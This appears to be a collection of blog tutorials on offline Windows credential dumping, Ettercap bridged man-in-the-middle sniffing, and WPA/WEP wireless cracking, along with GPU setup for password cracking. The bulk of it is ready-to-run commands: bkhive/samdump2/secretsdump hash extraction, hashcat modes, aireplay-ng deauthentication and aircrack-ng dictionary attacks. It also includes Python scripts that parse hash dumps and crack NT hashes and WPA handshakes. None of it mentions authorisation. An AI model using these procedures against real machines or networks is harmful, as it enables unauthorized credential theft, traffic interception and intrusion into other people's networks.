itjc.net

how to obtain a Windows password hash - offline

Basic Windows passwords (local accounts) are stored as hashes in the SAM registry hive, located by default at:

C:\Windows\System32\config\

The file is SAM. You also need SYSTEM from the same folder: the hashes in SAM are encrypted with the boot key (the "syskey"), which is derived from values in the SYSTEM hive.

Normally the kernel keeps these hives open with exclusive locks, so you can't copy the files while the system is running. But you CAN get at them while the system is offline via:

  • live cd
  • WinPE
  • mount the system drive in another machine

Caveat: If you cannot boot from a live CD, because you can't change the boot order or because the system is Windows 8 with Secure Boot enabled, you will need to resort to mounting the system drive in another machine. If the volume is encrypted (BitLocker or similar), neither route helps without the recovery key.


Once you have a copy of this folder, you can work with it offline, using the Linux programs bkhive and samdump2. Backtrack has these already installed for you, so use Backtrack, or obtain Linux binaries for bkhive and samdump2 on your Linux distro of choice.

Run these two commands:

bkhive ./config/SYSTEM keyout

samdump2 ./config/SAM keyout

(where config is the whole config folder from above). bkhive extracts the boot key from the SYSTEM hive into keyout; samdump2 then uses that key to decrypt the hashes in SAM. Newer samdump2 releases (3.x) have bkhive folded in and take the SYSTEM hive directly, as "samdump2 SYSTEM SAM"; impacket's secretsdump.py does the same job offline with "secretsdump.py -sam SAM -system SYSTEM LOCAL".


samdump2 will output a list of any hashes present, one line per account in pwdump format (user:RID:LMhash:NThash:::). These will be for the local user accounts on the computer, NOT domain accounts. An LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored; an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password, so there is nothing to crack for that account.

You can take this output, and dump it into your cracking tool of choice.

Your tool of choice is oclHashcat+: mode 1000 for the NT hashes, mode 3000 for any LM hashes (crack those first; LM is far weaker and usually gives you the NT password case-folded).
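As an added example (not from this page, and not code from samdump2 or hashcat), the following Python shows what to do with the pwdump-format lines samdump2 prints: split them into LM and NT inputs for hashcat, flag accounts that have no password or still carry an LM hash, and run a toy dictionary check to show why unsalted NT hashes fall so quickly. The sample lines, account names and wordlist are constructed for this example; the NT hashes in them are computed here from the strings named in the comments, and MD4 is implemented inline because hashlib's md4 is missing on many OpenSSL 3 builds.

```python
"""Added example for the SAM write-up above: handle samdump2's pwdump-style
output.  SAMPLE and WORDLIST are constructed for this example, not taken from
a real machine.  MD4 is implemented here because hashlib.new("md4") is
unavailable on many OpenSSL 3 builds."""
import struct

LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample in the user:rid:lmhash:nthash::: format samdump2 prints.
# Administrator and bob both carry the NT hash of "password"; Guest has no
# password; bob's LM field is a constructed non-empty value.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""
WORDLIST = ["letmein", "Password1", "password"]  # constructed wordlist


def md4(data: bytes) -> bytes:
    """MD4 as in RFC 1320: three rounds of 16 steps over 512-bit blocks."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h0, h1, h2, h3 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h0, h1, h2, h3
        for i in range(16):  # round 1: F(b,c,d) = (b & c) | (~b & d)
            a = rotl((a + ((b & c) | (~b & d)) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G(b,c,d) = majority(b, c, d)
            a = rotl((a + ((b & c) | (b & d) | (c & d)) + x[r2[i]] + 0x5A827999) & mask,
                     (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H(b,c,d) = b ^ c ^ d
            a = rotl((a + (b ^ c ^ d) + x[r3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h0, h1, h2, h3 = (h0 + a) & mask, (h1 + b) & mask, (h2 + c) & mask, (h3 + d) & mask
    return struct.pack("<4I", h0, h1, h2, h3)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); no salt and no iteration count."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse user:rid:lmhash:nthash::: lines and record the two checks made first."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        rows.append({
            "user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "no_password": nt.lower() == NT_EMPTY,  # nothing to crack
            "lm_present": lm.lower() != LM_EMPTY,   # weak LM hash still stored
        })
    return rows


def hashcat_inputs(rows) -> tuple:
    """Lines for `hashcat -m 3000 --username` (LM) and `hashcat -m 1000 --username` (NT)."""
    lm_lines = [f"{r['user']}:{r['lm']}" for r in rows if r["lm_present"]]
    nt_lines = [f"{r['user']}:{r['nt']}" for r in rows if not r["no_password"]]
    return lm_lines, nt_lines


def crack_nt(rows, wordlist) -> dict:
    """Dictionary check.  NT hashes are unsalted, so each candidate is hashed once
    and compared against every account: a big dump costs no more than a single hash."""
    lookup = {nt_hash(w): w for w in wordlist}
    return {r["user"]: lookup[r["nt"]] for r in rows if r["nt"] in lookup}


if __name__ == "__main__":
    rows = parse_pwdump(SAMPLE)
    lm, nt = hashcat_inputs(rows)
    print("LM targets:", lm)
    print("NT targets:", nt)
    print("cracked:", crack_nt(rows, WORDLIST))
```

The pure-Python MD4 is only there so the NT check runs anywhere; for real work hand the nt_lines/lm_lines files to hashcat with the modes noted in the comments.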

ettercap in bridged mode

Ettercap has been around for ages. It's currently on version 0.7.4.1, is available at: http://ettercap.sourceforge.net, and is included in Backtrack. For those of you who have no idea what Ettercap is, or what a packet sniffing program is, just think wiretapping. There's a lot more to it than just putting a tape recorder inside an analog phone, but the general idea is close.

In their own words:

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

There are a ton of websites out there which purport to give tutorials on how to use Ettercap. Go ahead and find them, and read them. Or better yet, run:

# ettercap -h
# man ettercap
# info ettercap

because basically, most of the sites I could find are just a regurgitation of Ettercap's own manual.

Be very careful when learning about, and using, Ettercap. Even if you do it right, you can degrade the performance of a large network. If you do it wrong, you can DoS the whole subnet, and even adjacent subnets on other switches.

Ettercap is capable of operating in bridged mode, which is almost invisible to the hosts: the monitoring machine sits physically in between A and B, and all traffic passes through the bridge freely, so no ARP poisoning or other active attack is required. The only thing the targets can observe is the brief link drop while you insert the bridge.

The command to run Ettercap in bridged mode is quite simple:

# ettercap -Tq -i eth0 -B eth1

However, when running this, I was getting an error 99 ("cannot assign address") about IP addresses not being assigned. I came across an article with the answer to this problem. In addition, it also suggested making your own bridge, and then running Ettercap on the bridge you just made instead of relying on Ettercap's bridge-mode code.

# brctl addbr mitm-bridge
# brctl addif mitm-bridge eth0
# brctl addif mitm-bridge eth1
# ifconfig eth0 0.0.0.0 up
# ifconfig eth1 0.0.0.0 up
# ifconfig mitm-bridge <GATEWAYIP> up

(Giving the bridge the real gateway's address puts a duplicate IP on the LAN and can confuse the gateway's other clients; an unused address on the same subnet avoids that conflict. On current distros brctl and ifconfig have been superseded by the ip tool, but the steps are the same.)

Turn on IP forwarding:

# echo 1 > /proc/sys/net/ipv4/ip_forward

(The kernel bridge forwards frames at layer 2 regardless of this setting; it only matters if the Monitor machine is also routing.)

Start sniffing:

# ettercap -Tq -i mitm-bridge

Now unplug the NIC of the Target, and move the cable to eth0 of the Monitor machine. Then connect eth1 of the Monitor to the NIC of the Target. The Target machine should have no idea what just happened, apart from a brief network disconnection. The Monitor machine should now be able to pick up all traffic to and from the Target machine.

How to crack WPA wireless passwords

Quick and dirty guide to cracking WPA wireless networks. Find more details, instructions and information at:

http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Get a live-cd or live-usb of Backtrack 5 here. You have a choice of Gnome or KDE, 32 or 64 bit.

Boot from the live-cd, which will automatically log in as root. Type "startx" to load the GUI. Open a terminal from the applications menu.

The simplest method, but not necessarily the fastest, uses the aircrack-ng program suite.

Identify your wireless card. Type "iwconfig" in the terminal (it lists only the interfaces with wireless extensions; "ifconfig" shows everything), and read the output. Your wireless card will probably be either wlan0 or ath0. For the rest of this guide, we will assume wlan0.

Put your wireless card into monitor mode, bring it back up, and start airodump:

# ifconfig wlan0 down

# iwconfig wlan0 mode monitor

# ifconfig wlan0 up

# airodump-ng wlan0

(On Backtrack, "airmon-ng start wlan0" does the same and creates a separate monitor interface, usually mon0; if you use it, substitute that name for wlan0 below.)

If all goes well, you should see airodump start listing visible wireless networks, and displaying information about them. If you get an error, check Google for assistance.

Press "ctrl+c" to close airodump once you see the name of the wireless network you are trying to crack. Run it again, with these changes to the command:

# airodump-ng -c <wireless channel> --bssid <mac address of wireless AP> -w capture wlan0

Note the flags: the BSSID filter is --bssid (airodump-ng's -b selects the band), and -w takes a file prefix, so the capture is written to capture-01.cap.

At this point, you will only be capturing packets related to the network in question. Wait until a station connects to the wireless network, and you capture the 4-way handshake. When this happens, airodump will display "WPA handshake: <mac address of wireless AP>" on the top line.

You can force any active stations to disconnect, at which point they will probably automatically reconnect. When they do, you can catch the handshake. To do this, you will use attack #0 (deauthentication) of aireplay. In another tab, run:

# aireplay-ng -0 60 -a <mac address of wireless AP> wlan0

(-a names the access point; add -c <mac address of a station> to deauthenticate one client instead of all of them, which is less disruptive and usually enough.)

If your laptop's signal is strong enough, this will disconnect the station, forcing it to reconnect, and allowing you to capture the handshake. Go back to the first tab, and check on airodump's progress, where you should see the note that a handshake has been captured. If not, try the aireplay command again a few times. If you still don't see a handshake, try getting closer to the access point or using a bigger wireless antenna, and double-check that there is an active station connected to the wireless network.

Okay, so you've captured a 4-way handshake. Now you can pass this to aircrack, which will perform a dictionary attack on the handshake. Each candidate passphrase costs 4096 rounds of PBKDF2 before it can be checked against the handshake, so depending on the size of the dictionary, this can take a few hours to run through.

# aircrack-ng -w <password list> -b <mac address of wireless AP> capture-01.cap

Backtrack has a decent password list at: /pentest/passwords/wordlists/darkc0de.lst
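As an added example, not from this page and not aircrack-ng's own code, here is the arithmetic aircrack-ng performs on a captured handshake, in Python: PBKDF2 to get the PMK, the 802.11i PRF to get the PTK (whose first 16 bytes, the KCK, sign the EAPOL frames), and the MIC comparison that tells a right guess from a wrong one. Every MAC, nonce and EAPOL frame below is constructed for the example (build_demo_handshake plants a passphrase and computes the matching MIC); against a real capture you would lift the same fields from EAPOL message 2 of the handshake.

```python
"""Added example for the WPA write-up above: the offline check aircrack-ng
runs on a captured 4-way handshake.  All MACs, nonces and the EAPOL frame are
constructed here (build_demo_handshake plants a passphrase), not taken from a
real capture."""
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4 bytes) + Key-descriptor fields before the Key MIC (77 bytes)


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Those 4096 iterations are the entire cost of one guess; the SSID is the salt,
    which is why precomputed tables (pyrit) are only reusable per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
            length: int = 48) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || data || i)
    where data = min(MACs) || max(MACs) || min(nonces) || max(nonces).  Bytes 0..15 are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    i = 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.  Descriptor version 1
    (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1; both are truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, mic, version, wordlist):
    """Dictionary attack: PMK -> PTK -> KCK per candidate, then compare the MIC it
    yields with the one the station actually sent.  Returns the passphrase or None."""
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol, version), mic):
            return candidate
    return None


def build_demo_handshake(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for a capture: a message-2 EAPOL-Key frame whose MIC was
    computed from `passphrase`.  Nothing here comes from a real network."""
    ap_mac = bytes.fromhex("001122334455")   # constructed BSSID
    sta_mac = bytes.fromhex("66778899aabb")  # constructed client MAC
    anonce = bytes(range(32))                # constructed AP nonce (from message 1)
    snonce = bytes(range(32, 64))            # constructed station nonce (from message 2)
    body = (
        b"\x02"                    # descriptor type: RSN
        + b"\x01\x0a"              # key info: version 2 (HMAC-SHA1), pairwise, MIC bit set
        + b"\x00\x10"              # key length 16 (CCMP)
        + (1).to_bytes(8, "big")   # replay counter
        + snonce                   # key nonce
        + b"\x00" * 16             # key IV
        + b"\x00" * 8              # key RSC
        + b"\x00" * 8              # key ID
        + b"\x00" * 16             # key MIC (filled in below)
        + b"\x00\x00"              # key data length
    )
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame, 2)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return dict(ssid=ssid, ap_mac=ap_mac, sta_mac=sta_mac, anonce=anonce,
                snonce=snonce, eapol=frame, mic=mic, version=2)


if __name__ == "__main__":
    # 802.11i test vector: passphrase "password", SSID "IEEE"
    print("PMK:", wpa_pmk("password", "IEEE").hex())
    hs = build_demo_handshake("correct horse", "itjc-demo")
    print("cracked:", crack_handshake(wordlist=["letmein", "password", "correct horse"], **hs))
```

The expensive step is wpa_pmk; everything after it is two HMACs. That is why GPU crackers and pyrit's per-SSID PMK tables help so much, and why a long passphrase, not a hidden SSID or MAC filtering, is the only thing that actually resists this attack.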

OpenCL in Backtrack

OpenCL is an open standard for general-purpose computation on GPUs (it is maintained by the Khronos Group; AMD/ATI's driver stack implements it, and that is the implementation this guide installs). Programs that utilise it are able to offload workloads from the CPU to the GPU. For the highly parallel jobs a GPU is built for, it is generally orders of magnitude faster than the CPU, so the workloads complete faster.

This is most noticeable for programs which perform repetitive number crunching, and password hashing is exactly that: each candidate is hashed independently, so thousands can run at once. This technology can turn an aging PC into a very capable password cracking box, with some very cool, very free software.

To start with, your requirements are a PC with an ATI graphics card. (If your graphics card is NVidia, you can use CUDA instead: here). You will also need a copy of Backtrack 5, installed on a hard drive, able to boot natively. You might be able to get away with installing Backtrack to a removable USB drive if you're a Windows user; just make sure you unplug your internal Windows drive first, so that you don't destroy your bootloader by accident.


From there, follow these simple steps to install the necessary drivers and software which unlock the full computing potential of the graphics card:

http://www.backtrack-linux.org/wiki/index.php/Install_OpenCL  (thanks g0tmi1k)

At this point, you are free to use the OpenCL-enabled software built into Backtrack, such as oclHashcat. The guide also shows you how to download pyrit, which is a GPU-enabled, distributed-computing-capable, very slick WPA cracker: it precomputes the PMK for each candidate passphrase against a given SSID, so the expensive PBKDF2 step is paid once per SSID and the table can be reused against any handshake from that network.

How to crack WEP wireless passwords

Wireless is ubiquitous, which means it's almost everywhere in the developed nations. Thankfully, most people have been educated about the dangers of using WEP encryption on their wireless networks. WEP encryption has a number of well-known weaknesses. The result is that a mildly interested person can look up steps and guides on how to crack a WEP password, and be able to understand and perform them.

This article demonstrates how somebody can break a WEP password in under 30 minutes.

Read more: How to crack WEP wireless passwords

